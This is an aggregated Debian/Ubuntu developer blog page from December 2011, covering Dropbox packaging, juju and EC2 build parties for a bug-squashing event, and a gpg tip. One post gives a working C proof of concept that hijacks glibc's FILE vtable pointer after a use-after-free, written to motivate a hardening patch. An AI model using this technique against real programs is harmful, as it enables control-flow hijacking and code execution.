Due to a bug, the files were not properly root-owned so I first fixed this (unpacking the tarball as root lead to reuse of the embedded user & group information, and those information changed recently on the Dropbox side apparently). Then we recently identified other problems related to proxy handling (see #651065). I fixed this too because it s relatively frequent that the initial download triggered during the package configuration fails and in that case it s the user that will re-trigger a package download after having given the appropriate credentials through PackageKit. Without my fix, usage of pkexec would imply the loss of the http_proxy environment variable and thus it would not be possible for a user to download through a proxy. Last but not least I reorganized the Debian specific patches to better separate what can and should be merged upstream, from the changes that upstream doesn t want. Unfortunately Dropbox insists on being able to auto-update their non-free binaries, they are, thus, against the installation under /var/lib/dropbox and the corresponding changes. Book update We re making decent progress in the translation of the Debian Administrator s Handbook, about 6 chapters are already translated (not yet reviewed though). The liberation campaign is also (slowly) going forward. We re at 67% now (thanks to 90 new supporters!) while we were only at 60% at the start of December. Thanks See you next month for a new summary of my activities.

No comment Liked this article? Click here. My blog is Flattr-enabled.

23 December 2011

Kees Cook: abusing the FILE structure

When attacking a process, one interesting target on the heap is the FILE structure used with stream functions (fopen(), fread(), fclose(), etc) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What s interesting is that this isn t actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have: glibc FILE vtable location In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc, could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn t protected the FILE structure in the same way. I m hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven t overlooked something, since I d really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :) Here s a quick exploit demonstration in a trivial use-after-free scenario:
#include <stdio.h>
#include <stdlib.h>
void pwn(void)
 
    printf("Dave, my mind is going.\n");
    fflush(stdout);
 
void * funcs[] =  
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
 ;
int main(int argc, char * argv[])
 
    FILE *fp;
    unsigned char *str;
    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));
    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    free(str);
    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r")))  
        perror("fopen");
        return 1;
     
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Trigger call to pwn(). */
    fclose(fp);
    return 0;
 
Before the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.
After the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault
Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I d like to see this fixed too, but it ll require more time to study. :)

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

7 December 2011

Kees Cook: how to throw an EC2 party

Prepare a location to run juju and install it:
mkdir ~/party
cd ~/party
sudo apt-get install juju
Initialize your juju environment. Be sure to add juju-origin: ppa to your environment, along with filling in your access-key and secret-key from your Amazon AWS account. Note that control-bucket and admin-secret should not be used by any other environment or juju won t be able to distinguish them. Other variables are good to set now too. I wanted my instances close to me, use I set region: us-west-1 . I also wanted a 64bit system, so using the AMI list, I chose default-series: oneiric , default-instance-type: m1.large and default-image-id: ami-7b772b3e
juju
$EDITOR ~/.juju/environments.yaml
Get my sbuild charm, and configure some types of builders. The salt should be something used only for this party; it is used to generate the random passwords for the builder accounts. The distro and releases can be set to whatever the mk-sbuild tool understands.
bzr co lp:~kees/charm/oneiric/sbuild/trunk sbuild-charm
cat >local.yaml <<EOM
builder-debian:
    salt: some-secret-phrase-for-this-party
    distro: debian
    releases: unstable
builder-ubuntu:
    salt: some-secret-phrase-for-this-party
    distro: ubuntu
    releases: precise,oneiric
EOM
Bootstrap juju and wait for ec2 instance to come up.
juju bootstrap
Before running the status, you can either accept the SSH key blindly, or use ec2-describe-instances to find the instance and public host name, and use my wait-for-ssh tool to inject the SSH host key into your ~/.ssh/known_hosts file. This requires having set up the environment variables needed by ec2-describe-instances , though.
ec2-describe-instances --region REGION
./sbuild-charm/wait-for-ssh INSTANCE HOST REGION
Get status:
juju status
Deploy a builder:
juju deploy --config local.yaml --repository $PWD local:sbuild-charm builder-debian
Deploy more of the same type:
juju add-unit builder-debian
juju add-unit builder-debian
juju add-unit builder-debian
Now you have to wait for them to finish installing, which will take a while. Once they re at least partially up (the builder user has been created), you can print out the slips of paper to hand out to your party attendees:
./sbuild-charm/slips   mpage -1 > /tmp/slips.ps
ps2pdf /tmp/slips.ps /tmp/slips.pdf
They look like this:
Unit: builder-debian/3
Host: ec2-256-1-1-1.us-west-1.compute.amazonaws.com
SSH key fingerprints:
  1024 3e:f7:66:53:a9:e8:96:c7:27:36:71:ce:2a:cf:65:31 (DSA)
  256 53:a9:e8:96:c7:20:6f:8f:4a:de:b2:a3:b7:6b:34:f7 (ECDSA)
  2048 3b:29:99:20:6f:8f:4a:de:b2:a3:b7:6b:34:bc:7a:e3 (RSA)
Username: builder
Password: 68b329da9893
To admin the machines, you can use juju itself, where N is the machine number from the juju status output:
juju ssh N
To add additional chroots to the entire builder service, add them to the config:
juju set builder-debian release=unstable,testing,stable
juju set builder-ubuntu release=precise,oneiric,lucid,natty
Notes about some of the terrible security hacks this charm does: Enjoy!

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

Kees Cook: juju bug fixing

My earlier post on juju described a number of weird glitches I ran into. I got invited by hazmat on IRC (freenode #juju) to try to reproduce the problems so we could isolate the trouble. Fix #1: use the version from the PPA. The juju setup documentation doesn t mention this, but it seems that adding juju-origin: ppa to your ~/.juju/environment.yaml is a good idea. I suggest it be made the default, and to link to the full list of legal syntax for the environment.yaml file. I was not able to reproduce the missing-machines-at-startup problem after doing this, but perhaps it s a hard race to lose. Fix #2: don t use terminate-machine . :P There seems to be a problem around doing the following series of commands: juju remove-unit FOO/N; juju terminate-machine X; juju add-unit FOO . This makes the provisioner go crazy, and leaves all further attempts to add units stick in pending forever. Big thank you to hazmat and SpamapS for helping debug this.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

6 December 2011

Steve Langasek: Making jam from bugs

This weekend, we held a combined Debian Bug Squashing Party and Ubuntu Local Jam in Portland, OR. A big thank you to PuppetLabs for hosting! Thanks to a brilliant insight from Kees Cook, we were able to give everyone access to their own pre-configured build environment as soon as they walked in the door by deploying schroot/sbuild instances in "the cloud" (in this case, Amazon EC2). Small blips with the mirrors notwithstanding, this worked out pretty well, and let people start to get their hands dirty as soon as they walked in the door instead of spending a lot of time up front doing the boring work of setting up a build environment. This was a big win for people who had never done a package build before, and I highly recommend it for future BSPs. You can read about the build environment setup in the Debian wiki, and details on setting up your own BSP cloud in Kees's blog. (And the cloud instances were running Ubuntu 11.10 guests, with Debian unstable chroots - a perfect pairing for our joint Debian/Ubuntu event!) So how did this curious foray into a combined Ubuntu/Debian event go? Not too shabby: When all was said and done, we didn't get a chance to tackle any wheezy release critical bugs like we'd hoped. That's ok, that leaves us something to do for our next event, which will be bigger and even better than this one. Maybe even big enough to rival one of those crazy, all-weekend BSPs that they have in Germany...

Kees Cook: EC2 instances in support of a BSP

On Sunday, I brought up EC2 instances to support the combined Debian Bug Squashing Party/Ubuntu Local Jam that took place at PuppetLabs in Portland, OR, USA. The intent was to provide each participant with their own sbuild environment on a 64bit machine, since we were going to be working on Multi-Arch support, and having both 64bit and 32bit chroots would be helpful. The host was an Ubuntu 11.10 (Oneiric) instance so it would be possible to do SRU verifications in the cloud too. I was curious about the juju provisioning system, since it has an interesting plugin system, called charms , that can be used to build out services. I decided to write an sbuild charm, which was pretty straight forward and quite powerful (using this charm it would be possible to trigger the creation of new schroots across all instances at any time, etc). The juju service itself works really well when it works correctly. When something goes wrong, unfortunately, it becomes nearly impossible to debug or fix. Repeatedly while working on charm development, the provisioning system would lose its mind, and I d have to destroy the entire environment and re-bootstrap to get things running again. I had hoped this wouldn t be the case while I was using it during production on Sunday, but the provisioner broke spectacularly on Sunday too. Due to the fragility of the juju agents, it wasn t possible to restart the provisioner it lost its mind, the other agent s couldn t talk to it any more, etc. I would expect the master services on a cloud instance manager to be extremely robust since having it die would mean totally losing control of all your instances. On Sunday morning, I started 8 instances. 6 came up perfectly and were excellent work-horses all day at the BSP. 2 never came up. The EC2 instances started, but the service provisioner never noticed them. Adding new units didn t work (instances would start, but no services would notice them), and when I tried to remove the seemingly broken machines, the instance provisioner completely went crazy and started dumping Python traces into the logs (which seems to be related to this bug, though some kind of race condition seems to have confused it much earlier than this total failure), and that was it. We used the instances we had, and I spent 3 hours trying to fix the provisioner, eventually giving up on it. I was very pleased with EC2 and Ubuntu Server itself on the instances. The schroots worked, sbuild worked (though I identified some additional things that the charm should likely do for setup). I think juju has a lot of potential, but I m surprised at how fragile it is. It didn t help that Amazon had rebooted the entire West Coast the day before and there were dead Ubuntu Archive Mirrors in the DNS rotation. For anyone else wanting to spin up builders in the cloud using juju, I have a run-down of what this looks like from the admin s perspective, and even include a little script to produce little slips of paper to hand out to attendees with an instance s hostname, ssh keys, and builder SSH password. Seemed to work pretty well overall; I just wish I could have spun up a few more. :) So, even with the fighting with juju and a few extra instances that came up and I had to shut down again without actually using them, the total cost to run the instances for the whole BSP was about US$40, and including the charm development time, about US$45. UPDATE: some more details on how to avoid the glitches I hit.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

5 December 2011

Kees Cook: PGP key photo viewing

Handy command line arguments for gpg:
gpg --list-options show-photos --fingerprint 0xdc6dc026
This is nice to examine someone s PGP photo. You can also include it in --verify-options, depending on how/when you want to see the photo (for example, when doing key signings). If gpg doesn t pick the right photo viewer, you can override it with --photo-viewer 'eog %I' or similar.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

Next.

Previous.